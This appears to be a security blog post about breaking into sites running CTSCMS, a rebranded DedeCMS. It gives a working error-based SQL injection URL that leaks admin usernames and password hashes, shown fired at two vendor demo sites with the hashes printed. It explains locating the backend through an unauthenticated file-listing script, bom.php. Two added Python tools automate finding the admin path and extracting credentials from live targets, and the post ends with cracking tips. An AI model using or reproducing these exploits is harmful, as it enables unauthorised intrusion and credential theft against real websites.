Latest CTSCMS vulnerability

China Tourism Service Website Management System (CTSCMS.COM) is a professional provider of tourism website source code, tourism website systems, tourism website templates and tourism website-building services, focused on tourism e-commerce and serving travel agencies and tourism ...

Well~ CTSCMS is really just DedeCMS (织梦) with its own templates on top, sold as a "commercial edition"~ and people actually pay 500 yuan for it.

Check the build date of the underlying DedeCMS core:
data/admin/ver.txt
It is usually from 2010, i.e. a core that is years out of date, so it may well be possible to get a shell directly with the old public DedeCMS bugs.

Exploit (the array key of typeArr[] in plus/search.php goes into the SQL query; the payload uses the floor(rand(0)*2) GROUP BY trick so MySQL echoes userid and pwd from the admin table back in a duplicate-key error):
[php]http://www.0day5.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a[/php]

The default backend path is
http://www.0day5.com/ctscms

If you cannot find the backend, that is easy too: while reading the source I noticed an interesting file,
bom.php
[php]
<?php
// remove the utf-8 boms
// by magicbug at gmail dot com
//
// Shipped with CTSCMS and reachable without authentication: the directory
// to scan comes straight from the request, every file found is printed,
// and (with $auto = 1) any file starting with a UTF-8 BOM is rewritten.

if (isset($_GET['dir'])) { // config the basedir; no validation, so '../' walks out of the webroot
    $basedir = $_GET['dir'];
} else {
    $basedir = '.';
}

$auto = 1; // 1 = strip BOMs in place, 0 = report only

checkdir($basedir);

// Recursively list every regular file under $basedir and report its BOM status.
function checkdir($basedir) {
    if ($dh = opendir($basedir)) {
        while (($file = readdir($dh)) !== false) {
            if ($file != '.' && $file != '..') {
                if (!is_dir($basedir."/".$file)) {
                    echo "filename: $basedir/$file ";
                    echo checkBOM("$basedir/$file")."\n";
                } else {
                    $dirname = $basedir."/".$file;
                    checkdir($dirname);
                }
            }
        }
        closedir($dh);
    }
}

// Look for the EF BB BF prefix; remove it when $auto is set.
function checkBOM($filename) {
    global $auto;
    $contents = file_get_contents($filename);
    $charset[1] = substr($contents, 0, 1);
    $charset[2] = substr($contents, 1, 1);
    $charset[3] = substr($contents, 2, 1);
    if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
        if ($auto == 1) {
            $rest = substr($contents, 3);
            rewrite($filename, $rest);
            return ("BOM found, automatically removed.");
        } else {
            return ("BOM found.");
        }
    }
    else return ("BOM Not Found.");
}

// Overwrite the file with the BOM stripped.
function rewrite($filename, $data) {
    $filenum = fopen($filename, "w");
    flock($filenum, LOCK_EX);
    fwrite($filenum, $data);
    fclose($filenum);
}
?>
[/php]
It lists every file on the site, heh~ no login needed, the directory comes from the dir parameter, and as a side effect it rewrites any file that starts with a UTF-8 BOM. So when you cannot find the backend, just request
http://www.0day5.com/bom.php

Then search the listing for sys_safe.php: the directory it sits in is the backend~
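To turn that listing into a backend URL without reading it by eye, here is an added example (mine, not part of this page or of CTSCMS). It parses the one-line-per-file output that bom.php's two echo statements produce ("filename: <path> <BOM status>"), pulls out every directory holding sys_safe.php, and also reports which files the request itself just rewrote, since $auto = 1 strips BOMs in place. The listing and the backend directory name lvyou_admin are constructed for the demo, not captured from a real host; the base URL is the one the page uses.

```python
"""Find the (renamed) CTSCMS backend from bom.php's file listing.

Added example, not part of this page or of CTSCMS. The listing below is
constructed in the shape bom.php's two echo statements produce per file:
'filename: <path> <BOM status>'.
"""
import posixpath
import re

LINE_RE = re.compile(r"^filename:\s+(?P<path>\S+)\s+(?P<status>BOM .+)$")

# Constructed sample of what http://target/bom.php returns (not from a real host).
# The backend directory name is made up to show the "renamed backend" case.
SAMPLE_LISTING = """\
filename: ./index.php BOM Not Found.
filename: ./bom.php BOM Not Found.
filename: ./plus/search.php BOM Not Found.
filename: ./data/admin/ver.txt BOM Not Found.
filename: ./lvyou_admin/index.php BOM Not Found.
filename: ./lvyou_admin/sys_safe.php BOM Not Found.
filename: ./templets/default/head.htm BOM found, automatically removed.
"""


def parse_listing(text):
    """Return [(path, status)] for every file line; anything else is ignored."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m.group("path"), m.group("status")))
    return rows


def find_admin_dirs(text, marker="sys_safe.php"):
    """Directories containing the marker file, relative to the scanned dir ('' = root)."""
    dirs = []
    for path, _ in parse_listing(text):
        if posixpath.basename(path) != marker:
            continue
        d = posixpath.dirname(path)
        if d == ".":
            d = ""
        elif d.startswith("./"):
            d = d[2:]
        dirs.append(d)
    return dirs


def admin_urls(base, text):
    """Backend URL candidates for a site rooted at base."""
    base = base.rstrip("/")
    return [f"{base}/{d}/" if d else f"{base}/" for d in find_admin_dirs(text)]


def rewritten_files(text):
    """Files the request itself modified: bom.php strips BOMs in place when $auto = 1."""
    return [p for p, s in parse_listing(text)
            if s.startswith("BOM found, automatically removed")]


if __name__ == "__main__":
    for url in admin_urls("http://www.0day5.com", SAMPLE_LISTING):
        print("backend:", url)
    for path in rewritten_files(SAMPLE_LISTING):
        print("rewritten by this request:", path)
```

Note the rewritten_files() output: every request to bom.php overwrites BOM-prefixed files on the target, so it is not a read-only recon step, and dir=../ walks outside the webroot because the parameter is passed to opendir() unchecked.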

Against the official demo sites:
[php]http://c.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a[/php]

Error infos: Duplicate entry '1|ctscms|d7f10e7cca0693eb8561' for key 'group_key'

[php]http://s.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a[/php]

Error infos: Duplicate entry '1|ctscms|c6364c485d55bb9df83a' for key 'group_key'
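The payload above and the two demo responses show the whole oracle: MySQL prints the colliding GROUP BY key in the "Duplicate entry" message, but only its first 64 characters, and one of those is the 0/1 that floor(rand(0)*2) prepends, which is why the payload reads a 62-character SUBSTRING window. Here is an added example (mine, not CTSCMS or DedeCMS code) that keeps the page's exact payload shape, walks the window across the row when userid|pwd is longer than 62 characters, and parses the error back into credentials. The mock oracle and SAMPLE_ROW are constructed so it runs offline; http_oracle() assumes, as the demo output shows, that the server prints the MySQL error in the page body; the base URL passed to it is whatever target you point it at.

```python
"""Windowed extraction for the floor(rand(0)*2)/GROUP BY error-based injection
in plus/search.php (typeArr[] key).

Added example, not CTSCMS/DedeCMS code. The payload shape is the one on the page;
the mock oracle and SAMPLE_ROW are constructed for offline testing.
"""
import re
import urllib.error
import urllib.request
from urllib.parse import quote

# The duplicate-entry message shows at most 64 characters of the key and the
# first one is the '0'/'1' from floor(rand(0)*2), so the page reads 62 per request.
CHUNK = 62
ADMIN_TABLE = "`#@__admin`"  # DedeCMS table-prefix placeholder, as in the page's URL

ERROR_RE = re.compile(r"Duplicate entry '(?P<entry>[^']*)' for key '[^']+'")


def build_typearr_key(offset: int, length: int = CHUNK) -> str:
    """Raw (unencoded) typeArr[] key from the page, parameterised on the SUBSTRING window."""
    inner = f"select CONCAT(0x7c,userid,0x7c,pwd) from {ADMIN_TABLE} limit 0,1"
    return (
        "111=@`\\'`) and (SELECT 1 FROM (select count(*),"
        f"concat(floor(rand(0)*2),(substring(({inner}),{offset},{length})))a "
        "from information_schema.tables group by a)b)#@`\\'` "
    )


def build_url(base: str, offset: int, length: int = CHUNK) -> str:
    """Full request URL; quote() turns '#' into %23 so it reaches the server, as the page's URL does."""
    key = quote(build_typearr_key(offset, length), safe="")
    return f"{base.rstrip('/')}/plus/search.php?keyword=as&typeArr[{key}]=a"


def parse_leak(body: str):
    """The leaked window, '' once the offset runs past the row, or None when no error is present."""
    m = ERROR_RE.search(body)
    if m is None:
        return None
    return m.group("entry")[1:]  # drop the leading '0'/'1' from floor(rand(0)*2)


def extract(oracle, chunk: int = CHUNK, max_len: int = 1024) -> str:
    """Walk SUBSTRING offsets until a window comes back short or empty."""
    leaked, offset = "", 1
    while len(leaked) < max_len:
        piece = parse_leak(oracle(offset, chunk))
        if not piece:  # None: injection did not fire; '': nothing left to read
            break
        leaked += piece
        if len(piece) < chunk:
            break
        offset += chunk
    return leaked


def split_credentials(leaked: str):
    """CONCAT(0x7c,userid,0x7c,pwd) yields '|userid|pwd'."""
    parts = leaked.split("|", 2)
    if len(parts) != 3:
        raise ValueError(f"unexpected leak shape: {leaked!r}")
    return parts[1], parts[2]


def http_oracle(base: str):
    """Oracle against a live target; the MySQL error text is in the response body."""
    def query(offset: int, length: int) -> str:
        url = build_url(base, offset, length)
        try:
            with urllib.request.urlopen(url, timeout=15) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.read().decode("utf-8", "replace")
    return query


# Constructed row (not real data): 88 characters, so it needs two windows.
SAMPLE_ROW = "|ctscms|" + "ab12" * 20


def mock_oracle(offset: int, length: int) -> str:
    """Simulates the server for SAMPLE_ROW; an empty window leaves just the '1' in the entry."""
    window = SAMPLE_ROW[offset - 1: offset - 1 + length]
    return f"Error infos: Duplicate entry '1{window}' for key 'group_key'"


if __name__ == "__main__":
    userid, pwd = split_credentials(extract(mock_oracle))
    print(userid, pwd)
```

Two practical notes: rand(0) is seeded, so the GROUP BY collision is deterministic as long as information_schema.tables has a few rows (it always does), which is why this fires every time rather than intermittently; and the 20-character pwd is DedeCMS's admin password format (a slice of the MD5, not the full hash), so treat it accordingly when cracking.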

Getting a shell from the backend needs no explanation~
